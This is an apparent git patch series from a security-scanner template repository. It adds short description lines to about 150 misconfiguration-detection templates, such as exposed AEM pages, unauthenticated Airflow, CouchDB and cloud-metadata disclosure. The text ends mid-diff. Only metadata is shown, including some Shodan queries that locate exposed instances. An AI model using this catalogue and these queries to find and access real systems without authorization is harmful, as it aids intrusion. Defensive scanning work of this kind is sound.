https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/huawei-auth-http-readfile.py diff --git a/http/vulnerabilities/other/tianqing-info-leak.yaml b/http/vulnerabilities/other/tianqing-info-leak.yaml index 9f650d1ec1..b022d7bc6d 100644 --- a/http/vulnerabilities/other/tianqing-info-leak.yaml +++ b/http/vulnerabilities/other/tianqing-info-leak.yaml @@ -4,7 +4,7 @@ info: name: Tianqing Info Leak author: ritikchaddha severity: medium - description: Information exposed in Tianqing. + description: Information exposed in Tianqing. reference: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g metadata: From 7753bff4bcc0dc3b29e98100ec39e491e9ebab40 Mon Sep 17 00:00:00 2001 From: Vikas Gupta <vikasgupta@BizOpss-MacBook-Air-3.local> Date: Wed, 3 Jan 2024 11:38:41 +0530 Subject: [PATCH 012/285] Updated descriptions of templates --- .../adobe/adobe-connect-username-exposure.yaml | 1 + http/misconfiguration/aem/aem-acs-common.yaml | 1 + http/misconfiguration/aem/aem-cached-pages.yaml | 1 + http/misconfiguration/aem/aem-crx-namespace.yaml | 1 + http/misconfiguration/aem/aem-disk-usage.yaml | 1 + http/misconfiguration/aem/aem-dump-contentnode.yaml | 1 + http/misconfiguration/aem/aem-explorer-nodetypes.yaml | 1 + http/misconfiguration/aem/aem-gql-servlet.yaml | 1 + http/misconfiguration/aem/aem-hash-querybuilder.yaml | 1 + http/misconfiguration/aem/aem-misc-admin.yaml | 1 + http/misconfiguration/aem/aem-offloading-browser.yaml | 1 + http/misconfiguration/aem/aem-osgi-bundles.yaml | 1 + .../aem/aem-querybuilder-internal-path-read.yaml | 1 + http/misconfiguration/aem/aem-security-users.yaml | 1 + http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml | 1 + http/misconfiguration/airflow/airflow-debug.yaml | 1 + http/misconfiguration/airflow/unauthenticated-airflow.yaml | 1 + http/misconfiguration/ampache-update-exposure.yaml | 1 + http/misconfiguration/android-debug-database-exposed.yaml | 1 + http/misconfiguration/apache-drill-exposure.yaml | 1 + http/misconfiguration/apache-druid-unauth.yaml | 1 + http/misconfiguration/apache-impala.yaml | 1 + http/misconfiguration/apache-struts-showcase.yaml | 1 + http/misconfiguration/apache/apache-couchdb-unauth.yaml | 1 + http/misconfiguration/apache/apache-hbase-unauth.yaml | 1 + http/misconfiguration/apache/apache-storm-unauth.yaml | 1 + http/misconfiguration/apc-info.yaml | 1 + http/misconfiguration/artifactory-anonymous-deploy.yaml | 1 + http/misconfiguration/aws/aws-object-listing.yaml | 1 + http/misconfiguration/bitbucket-public-repository.yaml | 1 + http/misconfiguration/bravia-signage.yaml | 1 + http/misconfiguration/casdoor-users-password.yaml | 1 + http/misconfiguration/chatgpt-web-unauth.yaml | 1 + http/misconfiguration/clickhouse-unauth-api.yaml | 1 + http/misconfiguration/clockwork-dashboard-exposure.yaml | 1 + http/misconfiguration/cloud-metadata.yaml | 1 + http/misconfiguration/cluster-panel.yaml | 1 + http/misconfiguration/codeigniter-errorpage.yaml | 1 + http/misconfiguration/codemeter-webadmin.yaml | 1 + http/misconfiguration/codis-dashboard.yaml | 1 + http/misconfiguration/collectd-exporter-metrics.yaml | 1 + http/misconfiguration/confluence-dashboard.yaml | 1 + http/misconfiguration/debug/flask-werkzeug-debug.yaml | 1 + http/misconfiguration/django-debug-detect.yaml | 1 + http/misconfiguration/docker-registry.yaml | 1 + http/misconfiguration/docmosis-tornado-server.yaml | 1 + http/misconfiguration/druid-monitor.yaml | 1 + http/misconfiguration/dynamic-container-host.yaml | 1 + http/misconfiguration/ec2-instance-information.yaml | 1 + http/misconfiguration/elastic-hd-dashboard.yaml | 1 + http/misconfiguration/elasticsearch.yaml | 1 + http/misconfiguration/envoy-admin-exposure.yaml | 1 + http/misconfiguration/espeasy-mega-exposure.yaml | 1 + http/misconfiguration/etcd-unauthenticated-api.yaml | 1 + http/misconfiguration/exposed-kafdrop.yaml | 1 + http/misconfiguration/exposed-kibana.yaml | 1 + http/misconfiguration/express-stack-trace.yaml | 1 + http/misconfiguration/filebrowser-unauth.yaml | 1 + http/misconfiguration/flask-redis-docker.yaml | 1 + http/misconfiguration/formalms-install.yaml | 1 + http/misconfiguration/fusionauth-admin-setup.yaml | 1 + http/misconfiguration/git-web-interface.yaml | 1 + http/misconfiguration/gitlab/gitlab-api-user-enum.yaml | 1 + http/misconfiguration/gitlist-disclosure.yaml | 1 + http/misconfiguration/global-traffic-statistics.yaml | 1 + http/misconfiguration/gocd/gocd-cruise-configuration.yaml | 1 + http/misconfiguration/gocd/gocd-encryption-key.yaml | 1 + http/misconfiguration/gocd/gocd-unauth-dashboard.yaml | 1 + http/misconfiguration/gopher-server.yaml | 1 + http/misconfiguration/grafana-public-signup.yaml | 1 + http/misconfiguration/grav-register-admin.yaml | 1 + http/misconfiguration/haproxy-exporter-metrics.yaml | 1 + http/misconfiguration/healthchecks-ui-exposure.yaml | 1 + http/misconfiguration/hivequeue-agent.yaml | 1 + http/misconfiguration/hp/unauthorized-hp-printer.yaml | 1 + http/misconfiguration/hp/unauthorized-printer-hp.yaml | 1 + http/misconfiguration/hpe-system-management-anonymous.yaml | 1 + http/misconfiguration/jaeger-ui-dashboard.yaml | 1 + http/misconfiguration/jetty-showcontexts-enable.yaml | 1 + http/misconfiguration/jolokia/jolokia-info-disclosure.yaml | 1 + http/misconfiguration/jolokia/jolokia-list.yaml | 1 + http/misconfiguration/jolokia/jolokia-mbean-search.yaml | 1 + http/misconfiguration/jupyter-notebooks-exposed.yaml | 1 + http/misconfiguration/kafka-cruise-control.yaml | 1 + http/misconfiguration/kubeflow-dashboard-unauth.yaml | 1 + http/misconfiguration/laravel-debug-error.yaml | 1 + http/misconfiguration/libvirt-exporter-metrics.yaml | 1 + http/misconfiguration/liferay/liferay-jsonws.yaml | 1 + http/misconfiguration/linkerd-ssrf-detect.yaml | 1 + http/misconfiguration/linktap-gateway-exposure.yaml | 1 + http/misconfiguration/locust-exposure.yaml | 1 + http/misconfiguration/lvm-exporter-metrics.yaml | 1 + http/misconfiguration/misconfigured-concrete5.yaml | 1 + http/misconfiguration/mobsf-framework-exposure.yaml | 1 + http/misconfiguration/namedprocess-exporter-metrics.yaml | 1 + http/misconfiguration/nextcloud-install.yaml | 1 + http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml | 1 + http/misconfiguration/node-express-status.yaml | 1 + http/misconfiguration/pa11y-dashboard.yaml | 1 + http/misconfiguration/pcdn-cache-node.yaml | 1 + http/misconfiguration/perfsonar-toolkit.yaml | 1 + http/misconfiguration/phpmemcached-admin-panel.yaml | 1 + http/misconfiguration/phpnow-works.yaml | 1 + http/misconfiguration/pinpoint-unauth.yaml | 1 + http/misconfiguration/postgres-exporter-metrics.yaml | 1 + http/misconfiguration/prometheus/prometheus-log.yaml | 1 + http/misconfiguration/qvidium-management-system-exposed.yaml | 1 + http/misconfiguration/rabbitmq-exporter-metrics.yaml | 1 + http/misconfiguration/ray-dashboard.yaml | 1 + http/misconfiguration/request-baskets-exposure.yaml | 1 + http/misconfiguration/sap/sap-directory-listing.yaml | 1 + http/misconfiguration/searchreplacedb2-exposure.yaml | 1 + http/misconfiguration/secnet-info-leak.yaml | 1 + http/misconfiguration/seeyon-unauth.yaml | 3 ++- http/misconfiguration/server-status-localhost.yaml | 1 + http/misconfiguration/sitecore-debug-page.yaml | 1 + http/misconfiguration/sitecore-lfi.yaml | 1 + http/misconfiguration/smarterstats-setup.yaml | 1 + http/misconfiguration/smokeping-grapher.yaml | 1 + http/misconfiguration/sonarqube-public-projects.yaml | 1 + http/misconfiguration/springboot/spring-eureka.yaml | 1 + http/misconfiguration/springboot/springboot-conditions.yaml | 1 + http/misconfiguration/springboot/springboot-features.yaml | 1 + http/misconfiguration/springboot/springboot-jolokia.yaml | 1 + http/misconfiguration/springboot/springboot-logfile.yaml | 1 + http/misconfiguration/springboot/springboot-loggers.yaml | 1 + http/misconfiguration/sql-server-report-viewer.yaml | 1 + http/misconfiguration/syncthing-dashboard.yaml | 1 + http/misconfiguration/system-properties-exposure.yaml | 1 + http/misconfiguration/tasmota-config-webui.yaml | 1 + http/misconfiguration/thinkphp-errors.yaml | 1 + http/misconfiguration/tomcat-cookie-exposed.yaml | 1 + http/misconfiguration/typo3-debug-mode.yaml | 1 + http/misconfiguration/unauth-axyom-network-manager.yaml | 1 + http/misconfiguration/unauth-kubecost.yaml | 1 + http/misconfiguration/unauth-ldap-account-manager.yaml | 1 + http/misconfiguration/unauth-mautic-upgrade.yaml | 1 + http/misconfiguration/unauth-mercurial.yaml | 1 + http/misconfiguration/unauth-opache-control-panel.yaml | 1 + http/misconfiguration/unauth-zwave-mqtt.yaml | 1 + http/misconfiguration/unauthenticated-lansweeper.yaml | 1 + http/misconfiguration/unauthenticated-netdata.yaml | 1 + http/misconfiguration/unauthenticated-nginx-dashboard.yaml | 1 + .../unauthorized-puppet-node-manager-detect.yaml | 1 + http/misconfiguration/untangle-admin-setup.yaml | 1 + http/misconfiguration/v2x-control.yaml | 1 + http/misconfiguration/vernemq-status-page.yaml | 1 + http/misconfiguration/viewpoint-system-status.yaml | 1 + http/misconfiguration/woodwing-git.yaml | 1 + http/misconfiguration/woodwing-phpinfo.yaml | 1 + http/misconfiguration/zhiyuan-oa-unauthorized.yaml | 1 + 151 files changed, 152 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml b/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml index 689bfff679..b44f8fa7fd 100644 --- a/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml +++ b/http/misconfiguration/adobe/adobe-connect-username-exposure.yaml @@ -4,6 +4,7 @@ info: name: Adobe Connect Username Exposure author: dhiyaneshDk severity: low + description: Adobe Connect Username is exposed. reference: - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html metadata: diff --git a/http/misconfiguration/aem/aem-acs-common.yaml b/http/misconfiguration/aem/aem-acs-common.yaml index e380613d92..b9b14a42fa 100644 --- a/http/misconfiguration/aem/aem-acs-common.yaml +++ b/http/misconfiguration/aem/aem-acs-common.yaml @@ -4,6 +4,7 @@ info: name: Adobe AEM ACS Common Exposure author: dhiyaneshDk severity: medium + description: Adobe AEM ACS Common pages exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt metadata: diff --git a/http/misconfiguration/aem/aem-cached-pages.yaml b/http/misconfiguration/aem/aem-cached-pages.yaml index cba756b341..cf4de5507e 100644 --- a/http/misconfiguration/aem/aem-cached-pages.yaml +++ b/http/misconfiguration/aem/aem-cached-pages.yaml @@ -4,6 +4,7 @@ info: name: Invalidate / Flush Cached Pages on AEM author: hetroublemakr severity: low + description: Cached Pages on AEM can be Flushed. reference: - https://twitter.com/AEMSecurity/status/1244965623689609217 metadata: diff --git a/http/misconfiguration/aem/aem-crx-namespace.yaml b/http/misconfiguration/aem/aem-crx-namespace.yaml index 83633e4167..9b7fdf6e37 100644 --- a/http/misconfiguration/aem/aem-crx-namespace.yaml +++ b/http/misconfiguration/aem/aem-crx-namespace.yaml @@ -4,6 +4,7 @@ info: name: Adobe AEM CRX Namespace Editor Exposure author: dhiyaneshDk severity: low + description: Adobe AEM CRX Namespace Editor is exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt metadata: diff --git a/http/misconfiguration/aem/aem-disk-usage.yaml b/http/misconfiguration/aem/aem-disk-usage.yaml index 81869afb1c..ee017a3181 100644 --- a/http/misconfiguration/aem/aem-disk-usage.yaml +++ b/http/misconfiguration/aem/aem-disk-usage.yaml @@ -4,6 +4,7 @@ info: name: Adobe AEM Disk Usage Information Disclosure author: dhiyaneshDk severity: low + description: Adobe AEM Disk Usage Information is exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt metadata: diff --git a/http/misconfiguration/aem/aem-dump-contentnode.yaml b/http/misconfiguration/aem/aem-dump-contentnode.yaml index 353f378621..0dd1906da4 100644 --- a/http/misconfiguration/aem/aem-dump-contentnode.yaml +++ b/http/misconfiguration/aem/aem-dump-contentnode.yaml @@ -4,6 +4,7 @@ info: name: AEM Dump Content Node Properties author: DhiyaneshDK severity: medium + description: Node Properties are exposed in AEM Dump. reference: - https://www.slideshare.net/0ang3el/hacking-aem-sites metadata: diff --git a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml index 472124bb32..56779a70fb 100644 --- a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml +++ b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml @@ -4,6 +4,7 @@ info: name: Adobe AEM Explorer NodeTypes Exposure author: dhiyaneshDk severity: high + description: Adobe AEM Explorer NodeTypes is exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt metadata: diff --git a/http/misconfiguration/aem/aem-gql-servlet.yaml b/http/misconfiguration/aem/aem-gql-servlet.yaml index 107ae55aa6..3993c067cc 100644 --- a/http/misconfiguration/aem/aem-gql-servlet.yaml +++ b/http/misconfiguration/aem/aem-gql-servlet.yaml @@ -4,6 +4,7 @@ info: name: AEM GQLServlet author: dhiyaneshDk,prettyboyaaditya severity: low + description: AEM GQLServlet is exposed. reference: - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html metadata: diff --git a/http/misconfiguration/aem/aem-hash-querybuilder.yaml b/http/misconfiguration/aem/aem-hash-querybuilder.yaml index 577230cb2d..13b25a3c59 100644 --- a/http/misconfiguration/aem/aem-hash-querybuilder.yaml +++ b/http/misconfiguration/aem/aem-hash-querybuilder.yaml @@ -4,6 +4,7 @@ info: name: Query hashed password via QueryBuilder Servlet author: DhiyaneshDk severity: medium + description: AEM hased password can be queried via QueryBuilder Servlet. reference: - https://twitter.com/AEMSecurity/status/1372392101829349376 metadata: diff --git a/http/misconfiguration/aem/aem-misc-admin.yaml b/http/misconfiguration/aem/aem-misc-admin.yaml index b886f78a2d..000a8c215f 100644 --- a/http/misconfiguration/aem/aem-misc-admin.yaml +++ b/http/misconfiguration/aem/aem-misc-admin.yaml @@ -4,6 +4,7 @@ info: name: Adobe AEM Misc Admin Dashboard Exposure author: dhiyaneshDk severity: high + description: Adobe AEM Misc Admin Dashboard is exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt metadata: diff --git a/http/misconfiguration/aem/aem-offloading-browser.yaml b/http/misconfiguration/aem/aem-offloading-browser.yaml index 91b08936cc..8318ddd9ff 100644 --- a/http/misconfiguration/aem/aem-offloading-browser.yaml +++ b/http/misconfiguration/aem/aem-offloading-browser.yaml @@ -4,6 +4,7 @@ info: name: Adobe AEM Offloading Browser author: dhiyaneshDk severity: medium + description: Adobe AEM Offloading Browser is exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt metadata: diff --git a/http/misconfiguration/aem/aem-osgi-bundles.yaml b/http/misconfiguration/aem/aem-osgi-bundles.yaml index c16699f5bf..3a6bea4352 100644 --- a/http/misconfiguration/aem/aem-osgi-bundles.yaml +++ b/http/misconfiguration/aem/aem-osgi-bundles.yaml @@ -4,6 +4,7 @@ info: name: Adobe AEM Installed OSGI Bundles author: dhiyaneshDk severity: low + description: Adobe AEM Installed OSGI Bundles leaked. reference: - https://www.slideshare.net/0ang3el/hacking-aem-sites metadata: diff --git a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml index 5d7818ebca..bd25e62280 100644 --- a/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml +++ b/http/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml @@ -4,6 +4,7 @@ info: name: AEM QueryBuilder Internal Path Read author: DhiyaneshDk severity: medium + description: AEM QueryBuilder is vulnerable to LFI. reference: - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 metadata: diff --git a/http/misconfiguration/aem/aem-security-users.yaml b/http/misconfiguration/aem/aem-security-users.yaml index 18d7e50cb6..742c714fa7 100644 --- a/http/misconfiguration/aem/aem-security-users.yaml +++ b/http/misconfiguration/aem/aem-security-users.yaml @@ -4,6 +4,7 @@ info: name: Adobe AEM Security Users Exposure author: dhiyaneshDk severity: medium + description: Adobe AEM Security Users are exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt metadata: diff --git a/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml b/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml index be9bf2a0c2..590bd6bbc9 100644 --- a/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml +++ b/http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml @@ -4,6 +4,7 @@ info: name: AEM WCM Suggestions Servlet author: DhiyaneshDk severity: low + description: AEM WCM Suggestions Servlet is exposed. reference: - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96 metadata: diff --git a/http/misconfiguration/airflow/airflow-debug.yaml b/http/misconfiguration/airflow/airflow-debug.yaml index ffa52793bb..3d2972b161 100644 --- a/http/misconfiguration/airflow/airflow-debug.yaml +++ b/http/misconfiguration/airflow/airflow-debug.yaml @@ -4,6 +4,7 @@ info: name: Airflow Debug Trace author: pdteam severity: low + description: Airflow Debug Trace enabled. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/airflow/unauthenticated-airflow.yaml b/http/misconfiguration/airflow/unauthenticated-airflow.yaml index 93eb15068c..678a5bcfec 100644 --- a/http/misconfiguration/airflow/unauthenticated-airflow.yaml +++ b/http/misconfiguration/airflow/unauthenticated-airflow.yaml @@ -4,6 +4,7 @@ info: name: Unauthenticated Airflow Instance author: dhiyaneshDK severity: high + description: Airflow Instance is exposed. metadata: max-request: 2 shodan-query: title:"Airflow - DAGs" diff --git a/http/misconfiguration/ampache-update-exposure.yaml b/http/misconfiguration/ampache-update-exposure.yaml index 13c7c2472a..46ce4c5606 100644 --- a/http/misconfiguration/ampache-update-exposure.yaml +++ b/http/misconfiguration/ampache-update-exposure.yaml @@ -4,6 +4,7 @@ info: name: Ampache Update Page Exposure author: ritikchaddha severity: low + description: Ampache update page is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/android-debug-database-exposed.yaml b/http/misconfiguration/android-debug-database-exposed.yaml index 31cc3bace2..1061857dba 100644 --- a/http/misconfiguration/android-debug-database-exposed.yaml +++ b/http/misconfiguration/android-debug-database-exposed.yaml @@ -4,6 +4,7 @@ info: name: Android Debug Manager author: dhiyaneshDK severity: low + description: Android Debug Manger is exposed. metadata: max-request: 1 shodan-query: http.title:"Android Debug Database" diff --git a/http/misconfiguration/apache-drill-exposure.yaml b/http/misconfiguration/apache-drill-exposure.yaml index 738b58fa27..6d5cb799e6 100644 --- a/http/misconfiguration/apache-drill-exposure.yaml +++ b/http/misconfiguration/apache-drill-exposure.yaml @@ -4,6 +4,7 @@ info: name: Apache Drill Exposure author: DhiyaneshDK severity: low + description: Apache Drill is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/apache-druid-unauth.yaml b/http/misconfiguration/apache-druid-unauth.yaml index c5324bd023..c650fc3155 100644 --- a/http/misconfiguration/apache-druid-unauth.yaml +++ b/http/misconfiguration/apache-druid-unauth.yaml @@ -4,6 +4,7 @@ info: name: Apache Druid Unauth author: DhiyaneshDk severity: low + description: Apache Druid is exposed to external users. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/apache-impala.yaml b/http/misconfiguration/apache-impala.yaml index 0103db4544..0521b9d6fa 100644 --- a/http/misconfiguration/apache-impala.yaml +++ b/http/misconfiguration/apache-impala.yaml @@ -4,6 +4,7 @@ info: name: Apache Impala - Exposure author: DhiyaneshDk severity: medium + description: Apache Impala is exposed. reference: - https://www.facebook.com/photo/?fbid=627585602745296&set=pcb.627585619411961 metadata: diff --git a/http/misconfiguration/apache-struts-showcase.yaml b/http/misconfiguration/apache-struts-showcase.yaml index 6b8fc72925..b3a6669e17 100644 --- a/http/misconfiguration/apache-struts-showcase.yaml +++ b/http/misconfiguration/apache-struts-showcase.yaml @@ -4,6 +4,7 @@ info: name: Apache Struts - ShowCase Application Exposure author: DhiyaneshDK severity: low + description: Apache Structs ShowCase Application is exposed. reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java metadata: diff --git a/http/misconfiguration/apache/apache-couchdb-unauth.yaml b/http/misconfiguration/apache/apache-couchdb-unauth.yaml index 6e5603c2a2..e2783e43fd 100644 --- a/http/misconfiguration/apache/apache-couchdb-unauth.yaml +++ b/http/misconfiguration/apache/apache-couchdb-unauth.yaml @@ -4,6 +4,7 @@ info: name: Apache CouchDB - Unauthenticated Access author: SleepingBag945 severity: high + description: Apache CouchDB is exposed to external users. reference: - https://github.com/ax1sX/SecurityList/blob/main/Database/CouchDB.md - https://github.com/taomujian/linbing/blob/master/python/app/plugins/http/CouchDB/Couchdb_Unauthorized.py diff --git a/http/misconfiguration/apache/apache-hbase-unauth.yaml b/http/misconfiguration/apache/apache-hbase-unauth.yaml index 63ad3b3d27..deddc8695f 100644 --- a/http/misconfiguration/apache/apache-hbase-unauth.yaml +++ b/http/misconfiguration/apache/apache-hbase-unauth.yaml @@ -4,6 +4,7 @@ info: name: Apache Hbase Unauth author: pikpikcu severity: medium + description: Apache Hbase is exposed. metadata: max-request: 1 tags: apache,unauth,misconfig diff --git a/http/misconfiguration/apache/apache-storm-unauth.yaml b/http/misconfiguration/apache/apache-storm-unauth.yaml index dc48849fe9..3c755ed015 100644 --- a/http/misconfiguration/apache/apache-storm-unauth.yaml +++ b/http/misconfiguration/apache/apache-storm-unauth.yaml @@ -4,6 +4,7 @@ info: name: Apache Storm Unauth author: pikpikcu severity: medium + description: Apache Storm instance is exposed. reference: - https://storm.apache.org/releases/current/STORM-UI-REST-API.html metadata: diff --git a/http/misconfiguration/apc-info.yaml b/http/misconfiguration/apc-info.yaml index b276451b59..53ff216340 100644 --- a/http/misconfiguration/apc-info.yaml +++ b/http/misconfiguration/apc-info.yaml @@ -4,6 +4,7 @@ info: name: APCu service information leakage author: koti2 severity: low + description: APCu service is vulnerable to information leakage. metadata: max-request: 2 tags: config,service,apcu,misconfig diff --git a/http/misconfiguration/artifactory-anonymous-deploy.yaml b/http/misconfiguration/artifactory-anonymous-deploy.yaml index 3351825cc1..f001ad32a1 100644 --- a/http/misconfiguration/artifactory-anonymous-deploy.yaml +++ b/http/misconfiguration/artifactory-anonymous-deploy.yaml @@ -4,6 +4,7 @@ info: name: Artifactory anonymous deploy author: panch0r3d severity: high + description: Artifactory anonymous repo is exposed. reference: - https://www.errno.fr/artifactory/Attacking_Artifactory.html metadata: diff --git a/http/misconfiguration/aws/aws-object-listing.yaml b/http/misconfiguration/aws/aws-object-listing.yaml index c533985d46..5a225b77bd 100644 --- a/http/misconfiguration/aws/aws-object-listing.yaml +++ b/http/misconfiguration/aws/aws-object-listing.yaml @@ -4,6 +4,7 @@ info: name: AWS bucket with Object listing author: pdteam severity: low + description: Object listing is enabled in AWS bucket. reference: - https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 metadata: diff --git a/http/misconfiguration/bitbucket-public-repository.yaml b/http/misconfiguration/bitbucket-public-repository.yaml index aa177cf1da..2ee71e0dbc 100644 --- a/http/misconfiguration/bitbucket-public-repository.yaml +++ b/http/misconfiguration/bitbucket-public-repository.yaml @@ -4,6 +4,7 @@ info: name: Atlassian Bitbucket Public Repository Exposure author: DhiyaneshDk severity: low + description: Bitbucket Public Repository is exposed. metadata: verified: true max-request: 2 diff --git a/http/misconfiguration/bravia-signage.yaml b/http/misconfiguration/bravia-signage.yaml index 4e1c23e540..228886d7a3 100644 --- a/http/misconfiguration/bravia-signage.yaml +++ b/http/misconfiguration/bravia-signage.yaml @@ -4,6 +4,7 @@ info: name: BRAVIA Signage - Exposure author: DhiyaneshDK severity: medium + description: Bravia Signage is exposed. reference: - https://twitter.com/WhiteOakSec/status/1667197552461004800 - https://www.whiteoaksecurity.com/blog/sony-bravia-remote-code-execution-disclosure/ diff --git a/http/misconfiguration/casdoor-users-password.yaml b/http/misconfiguration/casdoor-users-password.yaml index 5fb953b17f..4ffa159f8d 100644 --- a/http/misconfiguration/casdoor-users-password.yaml +++ b/http/misconfiguration/casdoor-users-password.yaml @@ -4,6 +4,7 @@ info: name: Casdoor get-users Account Password Disclosure author: DhiyaneshDk severity: high + description: Casdoor get-users Account Password is exposed. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1 - https://github.com/qingchenhh/qc_poc/blob/main/Goby/Casbin_get_users.go diff --git a/http/misconfiguration/chatgpt-web-unauth.yaml b/http/misconfiguration/chatgpt-web-unauth.yaml index e013627b64..8771377eb3 100644 --- a/http/misconfiguration/chatgpt-web-unauth.yaml +++ b/http/misconfiguration/chatgpt-web-unauth.yaml @@ -4,6 +4,7 @@ info: name: ChatGPT Web - Unauthorized Access author: SleepingBag945 severity: high + description: ChatGPT Web is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/clickhouse-unauth-api.yaml b/http/misconfiguration/clickhouse-unauth-api.yaml index 8a8675129c..f5f036c494 100644 --- a/http/misconfiguration/clickhouse-unauth-api.yaml +++ b/http/misconfiguration/clickhouse-unauth-api.yaml @@ -4,6 +4,7 @@ info: name: ClickHouse API Database Interface - Improper Authorization author: DhiyaneshDk severity: high + description: Clickhouse API Database is exposed. reference: - https://github.com/luck-ying/Library-POC/blob/master/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93%208123%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.py - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.md?plain=1 diff --git a/http/misconfiguration/clockwork-dashboard-exposure.yaml b/http/misconfiguration/clockwork-dashboard-exposure.yaml index 72d3375ea4..58f9d5cae6 100644 --- a/http/misconfiguration/clockwork-dashboard-exposure.yaml +++ b/http/misconfiguration/clockwork-dashboard-exposure.yaml @@ -4,6 +4,7 @@ info: name: Clockwork Dashboard Exposure author: dhiyaneshDk severity: high + description: Clockwork Dashboard is exposed. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json metadata: diff --git a/http/misconfiguration/cloud-metadata.yaml b/http/misconfiguration/cloud-metadata.yaml index 8ea0a12667..fbf113178a 100644 --- a/http/misconfiguration/cloud-metadata.yaml +++ b/http/misconfiguration/cloud-metadata.yaml @@ -4,6 +4,7 @@ info: name: GCP/AWS Metadata Disclosure author: DhiyaneshDk severity: low + description: GCP/AWS Metadata is exposed. reference: https://www.facebook.com/ExWareLabs/photos/pcb.5605494709514357/5605493856181109/ metadata: verified: true diff --git a/http/misconfiguration/cluster-panel.yaml b/http/misconfiguration/cluster-panel.yaml index 383da19110..51bd8d2ebc 100644 --- a/http/misconfiguration/cluster-panel.yaml +++ b/http/misconfiguration/cluster-panel.yaml @@ -4,6 +4,7 @@ info: name: Cluster Overview - Unauthenticated Dashboard Exposure author: tess severity: medium + description: Cluster Overview dashboard is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/codeigniter-errorpage.yaml b/http/misconfiguration/codeigniter-errorpage.yaml index 915e44a142..1366666b13 100644 --- a/http/misconfiguration/codeigniter-errorpage.yaml +++ b/http/misconfiguration/codeigniter-errorpage.yaml @@ -4,6 +4,7 @@ info: name: CodeIgniter - Error Page author: j4vaovo severity: low + description: CodeIgniter error debug are enabled. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/codemeter-webadmin.yaml b/http/misconfiguration/codemeter-webadmin.yaml index 6df35eeb2c..7d6bfad615 100644 --- a/http/misconfiguration/codemeter-webadmin.yaml +++ b/http/misconfiguration/codemeter-webadmin.yaml @@ -4,6 +4,7 @@ info: name: CodeMeter Webadmin Dashboard author: DhiyaneshDk severity: low + description: CodeMeter Webadmin Dashboard is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/codis-dashboard.yaml b/http/misconfiguration/codis-dashboard.yaml index 64755997e3..dc2e0183ec 100644 --- a/http/misconfiguration/codis-dashboard.yaml +++ b/http/misconfiguration/codis-dashboard.yaml @@ -4,6 +4,7 @@ info: name: Codis Dashboard Exposure author: tess severity: low + description: Codis Dashboard is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/collectd-exporter-metrics.yaml b/http/misconfiguration/collectd-exporter-metrics.yaml index 6c06580ed0..244a84b8d8 100644 --- a/http/misconfiguration/collectd-exporter-metrics.yaml +++ b/http/misconfiguration/collectd-exporter-metrics.yaml @@ -4,6 +4,7 @@ info: name: Collectd Exporter Metrics author: DhiyaneshDk severity: low + description: Collectd Exporter Metrics is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/confluence-dashboard.yaml b/http/misconfiguration/confluence-dashboard.yaml index 5586090ce9..96225e9c2f 100644 --- 